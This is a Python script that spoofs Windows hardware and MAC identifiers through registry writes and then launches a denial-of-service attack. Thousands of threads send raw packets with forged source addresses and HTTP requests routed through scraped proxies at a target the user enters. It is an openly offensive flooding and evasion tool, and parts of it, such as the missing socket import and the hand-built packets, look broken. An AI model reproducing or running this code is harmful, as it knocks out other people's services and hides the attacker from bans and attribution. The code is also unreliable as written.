import ctypes
import ctypes.wintypes
import sys
import random
import requests
import threading
import time
import os
import winreg

def spoof_hwid():
    kernel32 = ctypes.WinDLL('kernel32')
    advapi32 = ctypes.WinDLL('advapi32')
    
    new_serial = f"{random.randint(10000000,99999999)}"
    
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001", 0, winreg.KEY_SET_VALUE)
        winreg.SetValueEx(key, "HwProfileGuid", 0, winreg.REG_SZ, f"{{{new_serial}-{random.randint(1000,9999)}-{random.randint(1000,9999)}-{random.randint(1000,9999)}-{new_serial}}}")
        winreg.CloseKey(key)
    except:
        pass
    
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Services\Disk\Enum", 0, winreg.KEY_SET_VALUE)
        winreg.SetValueEx(key, "0", 0, winreg.REG_SZ, f"IDE\\Disk{new_serial}")
        winreg.CloseKey(key)
    except:
        pass
    
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Cryptography", 0, winreg.KEY_SET_VALUE)
        winreg.SetValueEx(key, "MachineGuid", 0, winreg.REG_SZ, new_serial)
        winreg.CloseKey(key)
    except:
        pass
    
    try:
        key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName", 0, winreg.KEY_SET_VALUE)
        winreg.SetValueEx(key, "ComputerName", 0, winreg.REG_SZ, f"PC-{new_serial}")
        winreg.CloseKey(key)
    except:
        pass
    
    return True

def mac_spoof():
    import subprocess
    new_mac = "".join([random.choice("0123456789ABCDEF") for _ in range(12)])
    subprocess.run(f'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Class\\{{4d36e972-e325-11ce-bfc1-08002be10318}}\\0001" /v NetworkAddress /t REG_SZ /d {new_mac} /f', shell=True, capture_output=True)

def ddos_attack(target_ip, target_port=80):
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    
    spoofed_ips = [f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}" for _ in range(1000)]
    
    while True:
        try:
            src_ip = random.choice(spoofed_ips)
            packet = (
                b'\x45\x00\x00\x28' +
                random.randbytes(2) +
                b'\x00\x00\x40\x00\x40\x06\x00\x00' +
                socket.inet_aton(src_ip) +
                socket.inet_aton(target_ip) +
                target_port.to_bytes(2,'big') +
                b'\x00\x50' +
                random.randbytes(12)
            )
            sock.sendto(packet, (target_ip, target_port))
        except:
            pass

def http_spoof_flood(target_url):
    user_agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Mozilla/5.0 (iPhone; CPU iPhone OS 14_0 like Mac OS X)",
        "Mozilla/5.0 (Linux; Android 10; SM-G973F)",
        "Googlebot/2.1 (+http://www.google.com/bot.html)",
        "curl/7.68.0",
        "Python-requests/2.25.0"
    ]
    
    proxies = []
    try:
        proxy_list = requests.get("https://api.proxyscrape.com/v2/?request=getproxies&protocol=http&timeout=10000&country=all").text.split()
        proxies = [{"http": f"http://{p}"} for p in proxy_list[:100]]
    except:
        pass
    
    while True:
        for ua in user_agents:
            try:
                headers = {
                    "User-Agent": ua,
                    "X-Forwarded-For": f"{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}.{random.randint(1,255)}",
                    "Accept-Language": random.choice(["en-US,en;q=0.9", "fr-FR,fr;q=0.8", "de-DE,de;q=0.7"]),
                    "Cache-Control": "no-cache"
                }
                if proxies:
                    requests.get(target_url, headers=headers, proxies=random.choice(proxies), timeout=2)
                else:
                    requests.get(target_url, headers=headers, timeout=2)
            except:
                pass

if __name__ == "__main__":
    spoof_hwid()
    mac_spoof()
    
    target = input("Target IP: ")
    url = input("Target URL: ")
    
    for _ in range(1000):
        threading.Thread(target=ddos_attack, args=(target,), daemon=True).start()
    for _ in range(500):
        threading.Thread(target=http_spoof_flood, args=(url,), daemon=True).start()
    
    print(f"[+] HWID/MAC spoofed. Flooding {target} and {url}")
    while True:
        time.sleep(1)
